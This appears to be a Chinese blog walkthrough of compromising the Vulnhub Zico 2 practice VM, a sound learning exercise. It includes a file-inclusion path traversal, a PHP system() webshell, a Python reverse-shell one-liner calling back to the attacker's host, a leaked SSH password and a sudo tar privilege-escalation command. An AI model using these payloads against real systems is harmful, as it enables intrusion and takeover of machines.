当前位置: 首页 > article >正文

Vulhub zico 2靶机详解

项目地址

https://download.vulnhub.com/zico/zico2.ova

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

根据对比可知Zico 2的一个ip地址为192.168.47.163

扫描Zico 2的操作系统,端口及对应服务

nmap -A -p- 192.168.47.163

发现开放22,80和38665端口

目录扫描

dirb http://192.168.47.163

访问网站

将过测试发现http://192.168.47.163/view.php?page=tools.html页面,可能存在文件包含漏洞

输入page参数后输入文件名,发现包含成功存在文件包含漏洞

http://192.168.47.163/view.php?page=../../etc/passwd

拼接/dbadmin路径发现登录界面,且使用的phpLiteAdmin框架

弱口令admin登录成功

获取shell

使用searchsploit工具扫描phpLiteAdmin框架存在的漏洞

写入<?php phpinfo();?>,之后通过文包含执行命令

被解析了,说明漏洞可用

写入一句话木马

<?php echo system($_GET["pass"]);?>

反弹shell

http://192.168.47.163/view.php?page=../../../../usr/databases/hacker.php&pass=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.47.129",7272));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

kali开启监听

nc -lvvp 7272

反弹成功

提权

进入到/home/zico目录,查看to_do.txt文件

cd /home/zico
cat to_do.txt

进入到wordpress目录下,发下wordpress配置文件,查看此文件,发现账号密码

cd wordpress
ls -al
cat wp-config.php

使用ssh连接

ssh zico@192.168.47.163
sWfCsfJSPV9H3AmQzw8

连接成功

输入 sudo -l ,查看哪些命令具有 root 权限

可以利用tar命令来进行提权

进入辅助网站tar | GTFOBins

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

提权成功


http://www.kler.cn/a/326036.html

相关文章:

  • Ubuntu22.04 安装mysql8 无法修改端口及配置的问题 坑啊~~~~
  • Jenkins的pipeline Script的 每个组件的详细讲解
  • 从零开始学习 sg200x 多核开发之 eth0 MAC 地址修改
  • 【Android原生问题分析】夸克、抖音划动无响应问题【Android14】
  • 某某科技笔试题
  • MySQL的游标和While循环的详细对比
  • GS-SLAM论文阅读笔记--MM3DGS SLAM
  • A Learning-Based Approach to Static Program Slicing —— 论文笔记
  • 【Git原理与使用】分支管理
  • C++可见性
  • 关于武汉芯景科技有限公司的IIC电平转换芯片XJ9509开发指南(兼容PCa9509)
  • Matlab实现麻雀优化算法优化回声状态网络模型 (SSA-ESN)(附源码)
  • linux环境oracle11.2.0.4打补丁(p31537677_112040_Linux-x86-64.zip)
  • [M贪心] lc2207. 字符串中最多数目的子序列(模拟+贪心+一次遍历+代码细节+思维)
  • 无人机避障—— 激光雷达定高北醒TF03-UART(二)
  • 【基础算法总结】分治--快排+归并
  • YOLOv8改进,YOLOv8改进损失函数采用Powerful-IoU(2024年最新IOU),助力涨点
  • 【YOLOv10改进[SPPF]】使用 SPPFCSPC替换SPPF模块 + 含全部代码和详细修改方式
  • Linux内核 -- 读写文件系统文件之kernel_read与kernel_write
  • APISIX 联动雷池 WAF 实现 Web 安全防护
  • VLAN Bond 堆叠
  • 苍穹外卖学习笔记(十三)
  • TikTok Shop成印尼第二大电商平台,TikTok怎么快速涨粉?
  • OpenCV开发笔记(八十一):通过棋盘格使用鱼眼方式标定相机内参矩阵矫正摄像头图像
  • 关于音频噪音处理【常见问题、解决方案等】
  • yolov8/9/10模型在垃圾分类检测中的应用【代码+数据集+python环境+GUI系统】